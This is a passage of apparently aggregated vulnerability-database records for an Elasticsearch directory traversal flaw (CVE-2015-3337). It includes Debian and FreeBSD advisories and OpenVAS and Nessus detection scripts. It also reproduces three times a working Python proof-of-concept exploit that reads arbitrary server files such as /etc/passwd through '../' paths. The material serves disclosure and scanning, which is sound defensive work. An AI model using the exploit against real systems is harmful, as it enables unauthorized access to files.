the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"elasticsearch\", ver:\"1.0.3+dfsg-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:25:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "description": "Elasticsearch is prone to a directory traversal vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-05-05T00:00:00", "id": "OPENVAS:1361412562310105265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105265", "type": "openvas", "title": "Elasticsearch Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Elasticsearch Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:elasticsearch:elasticsearch\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105265\");\n script_cve_id(\"CVE-2015-3337\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-05-08T11:13:33+0000\");\n\n script_name(\"Elasticsearch Directory Traversal Vulnerability\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response\");\n\n script_tag(name:\"insight\", value:\"Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\n when a site plugin is enabled, allows remote attackers to read arbitrary files.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"Elasticsearch is prone to a directory traversal vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-05-05 15:11:20 +0200 (Tue, 05 May 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_elastsearch_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 9200);\n script_mandatory_keys(\"elasticsearch/installed\");\n\n 
exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\nfiles = traversal_files();\nplugins = make_list('test','kopf', 'HQ', 'marvel', 'bigdesk', 'head', 'paramedic', 'elasticsearch', 'git', 'jboss', 'log', 'tomcat', 'wiki');\n\nforeach plugin ( plugins ) {\n url = '/_plugin/' + plugin + '/';\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( buf =~ \"^HTTP/1\\.[01] 200\" ) {\n check_plugin = plugin;\n break;\n }\n}\n\nif( check_plugin ) {\n foreach file ( keys( files ) ) {\n url = '/_plugin/' + check_plugin + '/../../../../../../' + files[file];\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T04:58:45", "description": "ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal. CVE-2015-3337. 
Webapps exploit for php platform", "published": "2015-05-18T00:00:00", "type": "exploitdb", "title": "ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3337"], "modified": "2015-05-18T00:00:00", "id": "EDB-ID:37054", "href": "https://www.exploit-db.com/exploits/37054/", "sourceData": "#!/usr/bin/python\r\n# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign\r\n# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5\r\n# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net\r\n# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/\r\n#\r\n# Source: https://github.com/pandujar/elasticpwn/\r\n\r\nimport socket, sys\r\n\r\nprint \"!dSR ElasticPwn - for CVE-2015-3337\\n\"\r\nif len(sys.argv) <> 3:\r\n print \"Ex: %s www.example.com /etc/passwd\" % sys.argv[0]\r\n sys.exit()\r\n\r\nport = 9200 # Default ES http port\r\nhost = sys.argv[1]\r\nfpath = sys.argv[2]\r\n\r\ndef grab(plugin):\r\n\t\tsocket.setdefaulttimeout(3)\r\n\t\ts = socket.socket()\r\n\t\ts.connect((host,port))\r\n\t\ts.send(\"GET /_plugin/%s/../../../../../..%s HTTP/1.0\\n\"\r\n\t\t\t\"Host: %s\\n\\n\" % (plugin, fpath, host))\r\n\t\tfile = s.recv(2048)\r\n\t\tprint \"\t[*] Trying to retrieve %s:\" % fpath\r\n\t\tif (\"HTTP/1.0 200 OK\" in file):\r\n\t\t\tprint \"\\n%s\" % file\r\n\t\telse:\r\n\t\t print \"[-] File Not Found, No Access Rights or System Not Vulnerable\"\r\n\r\ndef pfind(plugin):\r\n\ttry:\r\n\t\tsocket.setdefaulttimeout(3)\r\n\t\ts = socket.socket()\r\n\t\ts.connect((host,port))\r\n\t\ts.send(\"GET /_plugin/%s/ HTTP/1.0\\n\"\r\n\t\t\t\"Host: %s\\n\\n\" % (plugin, host))\r\n\t\tfile = s.recv(16)\r\n\t\tprint \"[*] Trying to find plugin %s:\" % plugin\r\n\t\tif (\"HTTP/1.0 200 OK\" in file):\r\n\t\t\tprint \"[+] Plugin found!\"\r\n\t\t\tgrab(plugin)\r\n\t\t\tsys.exit()\r\n\t\telse:\r\n\t\t print \"[-] Not Found \"\r\n\texcept Exception, e:\r\n\t\tprint \"[-] Error connecting 
to %s: %s\" % (host, e)\r\n\t\tsys.exit()\r\n\r\n# Include more plugin names to check if they are installed\r\npluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']\r\n\r\nfor plugin in pluginList:\r\n\tpfind(plugin)", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37054/"}], "debian": [{"lastseen": "2019-05-30T02:23:08", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3337"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3241-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 29, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : elasticsearch\nCVE ID : CVE-2015-3337\n\nJohn Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your elasticsearch packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2015-04-29T20:33:18", "published": "2015-04-29T20:33:18", "id": "DEBIAN:DSA-3241-1:66E01", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00129.html", "title": "[SECURITY] [DSA 3241-1] elasticsearch security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nElasticSearch 1.4.5 1.5.2 - Directory Traversal", "edition": 1, "published": 
"2015-05-18T00:00:00", "title": "ElasticSearch 1.4.5 1.5.2 - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3337"], "modified": "2015-05-18T00:00:00", "id": "EXPLOITPACK:C495535BB475BBDF733BEC03D1BDE040", "href": "", "sourceData": "#!/usr/bin/python\n# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign\n# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5\n# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net\n# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/\n#\n# Source: https://github.com/pandujar/elasticpwn/\n\nimport socket, sys\n\nprint \"!dSR ElasticPwn - for CVE-2015-3337\\n\"\nif len(sys.argv) <> 3:\n print \"Ex: %s www.example.com /etc/passwd\" % sys.argv[0]\n sys.exit()\n\nport = 9200 # Default ES http port\nhost = sys.argv[1]\nfpath = sys.argv[2]\n\ndef grab(plugin):\n\t\tsocket.setdefaulttimeout(3)\n\t\ts = socket.socket()\n\t\ts.connect((host,port))\n\t\ts.send(\"GET /_plugin/%s/../../../../../..%s HTTP/1.0\\n\"\n\t\t\t\"Host: %s\\n\\n\" % (plugin, fpath, host))\n\t\tfile = s.recv(2048)\n\t\tprint \"\t[*] Trying to retrieve %s:\" % fpath\n\t\tif (\"HTTP/1.0 200 OK\" in file):\n\t\t\tprint \"\\n%s\" % file\n\t\telse:\n\t\t print \"[-] File Not Found, No Access Rights or System Not Vulnerable\"\n\ndef pfind(plugin):\n\ttry:\n\t\tsocket.setdefaulttimeout(3)\n\t\ts = socket.socket()\n\t\ts.connect((host,port))\n\t\ts.send(\"GET /_plugin/%s/ HTTP/1.0\\n\"\n\t\t\t\"Host: %s\\n\\n\" % (plugin, host))\n\t\tfile = s.recv(16)\n\t\tprint \"[*] Trying to find plugin %s:\" % plugin\n\t\tif (\"HTTP/1.0 200 OK\" in file):\n\t\t\tprint \"[+] Plugin found!\"\n\t\t\tgrab(plugin)\n\t\t\tsys.exit()\n\t\telse:\n\t\t print \"[-] Not Found \"\n\texcept Exception, e:\n\t\tprint \"[-] Error connecting to %s: %s\" % (host, e)\n\t\tsys.exit()\n\n# Include more plugin names to check if they are installed\npluginList = ['test','kopf', 'HQ', 'marvel', 
'bigdesk', 'head']\n\nfor plugin in pluginList:\n\tpfind(plugin)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3337"], "description": "\nElastic reports:\n\nVulnerability Summary: All Elasticsearch versions prior to 1.5.2\n\t and 1.4.5 are vulnerable to a directory traversal attack that allows\n\t an attacker to retrieve files from the server running Elasticsearch\n\t when one or more site plugins are installed, or when Windows is the\n\t server OS.\nRemediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users\n\t that do not want to upgrade can address the vulnerability by\n\t disabling site plugins. See the CVE description for additional\n\t options.\n\n", "edition": 4, "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "A71E7440-1BA3-11E5-B43D-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/a71e7440-1ba3-11e5-b43d-002590263bf5.html", "title": "elasticsearch -- directory traversal attack with site plugins", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:26", "description": "", "published": "2015-05-01T00:00:00", "type": "packetstorm", "title": "ElasticSearch Directory Traversal Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3337"], "modified": "2015-05-01T00:00:00", "id": "PACKETSTORM:131718", "href": "https://packetstormsecurity.com/files/131718/ElasticSearch-Directory-Traversal-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/python \n# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign \n# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 \n# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net \n# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ \n \nimport socket, sys \n \nprint \"!dSR ElasticPwn - for 
CVE-2015-3337\\n\" \nif len(sys.argv) <> 3: \nprint \"Ex: %s www.example.com /etc/passwd\" % sys.argv[0] \nsys.exit() \n \nport = 9200 # Default ES http port \nhost = sys.argv[1] \nfpath = sys.argv[2] \n \ndef grab(plugin): \nsocket.setdefaulttimeout(3) \ns = socket.socket() \ns.connect((host,port)) \ns.send(\"GET /_plugin/\"+plugin+\"/../../../../../..\"+fpath+ \" HTTP/1.0\\n\" \n\"Host: \"+host+\"\\n\\n\") \nfile = s.recv(2048) \nprint \" [*] Trying to retrieve \"+str(fpath)+\":\" \nif (\"HTTP/1.0 200 OK\" in file): \nprint \"\\n\"+file \nelse: \nprint \"[-] File Not Found or system not vulnerable\" \n \ndef pfind(plugin): \ntry: \nsocket.setdefaulttimeout(3) \ns = socket.socket() \ns.connect((host,port)) \ns.send(\"GET /_plugin/\"+plugin+\"/ HTTP/1.0\\n\" \n\"Host: \"+host+\"\\n\\n\") \nfile = s.recv(16) \nprint \"[*] Trying to find plugin \"+plugin+\":\" \nif (\"HTTP/1.0 200 OK\" in file): \nprint \"[+] Plugin found!\" \ngrab(plugin) \nsys.exit() \nelse: \nprint \"[-] Not Found \" \nexcept Exception, e: \nprint \"[-] Error connecting to \"+host+\" \"+str(e) \nsys.exit() \n \n# Include more plugin names to check if they are installed \npluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] \n \nfor plugin in pluginList: \npfind(plugin) \n \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131718/elasticpwn.py.txt"}], "nessus": [{"lastseen": "2021-01-12T09:49:05", "description": "John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.", "edition": 22, "published": "2015-04-30T00:00:00", "title": "Debian DSA-3241-1 : elasticsearch - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "modified": "2015-04-30T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:elasticsearch"], "id": 
"DEBIAN_DSA-3241.NASL", "href": "https://www.tenable.com/plugins/nessus/83147", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3241. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83147);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3337\");\n script_bugtraq_id(74353);\n script_xref(name:\"DSA\", value:\"3241\");\n\n script_name(english:\"Debian DSA-3241-1 : elasticsearch - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/elasticsearch\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3241\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the elasticsearch packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:elasticsearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"elasticsearch\", reference:\"1.0.3+dfsg-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}